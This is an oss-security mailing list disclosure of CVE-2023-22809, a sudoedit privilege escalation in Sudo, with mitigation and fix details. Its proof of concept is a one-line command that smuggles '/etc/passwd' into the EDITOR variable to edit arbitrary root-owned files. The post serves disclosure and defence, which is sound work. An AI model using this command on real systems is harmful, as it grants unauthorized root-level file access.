[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] CVE-2023-22809: Sudoedit can edit arbitrary files
From:       Matthieu Barjole <matthieu.barjole () synacktiv ! com>
Date:       2023-01-19 0:33:43
Message-ID: CAE-GootkXskaRKTmdPg1KsL3cm2oPq8DtL14MoupwX_CaVDeXw () mail ! gmail ! com
[Download RAW message or body]


Hello everyone,

While auditing Sudo, Synacktiv identified a privilege escalation in sudoedit
when a user is authorized to use it by the sudoers policy. This
vulnerability
was assigned CVE-2023-22809 and affects Sudo versions 1.8.0 through 1.9.12p1
inclusive.

## Analysis

The technical analysis can be found in the following security advisory:
https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf

## Proof of Concept

Assuming the following sudoers policy:

```
# cat /etc/sudoers
user ALL=(ALL:ALL) sudoedit /etc/motd
[...]
```

Arbitrary files such as `/etc/passwd` may also be edited as such:

```
EDITOR='vim -- /etc/passwd' sudoedit /etc/motd
```

## Mitigation

It is possible to prevent a user-specified editor from being used by
sudoedit by
adding the following line to the sudoers file.

```
Defaults!sudoedit   env_delete+="SUDO_EDITOR VISUAL EDITOR"
```

To restrict the editor when editing specific files, a Cmnd_Alias can be
used,
for example:

```
Cmnd_Alias          EDIT_MOTD = sudoedit /etc/motd
Defaults!EDIT_MOTD  env_delete+="SUDO_EDITOR VISUAL EDITOR"
user                ALL = EDIT_MOTD
```

## Fix

The issue was fixed in Sudo 1.9.12.p2.

## References

[1]
https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf
[2] https://www.sudo.ws/security/advisories/sudoedit_any/
[3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22809


[prev in list] [next in list] [prev in thread] [next in thread]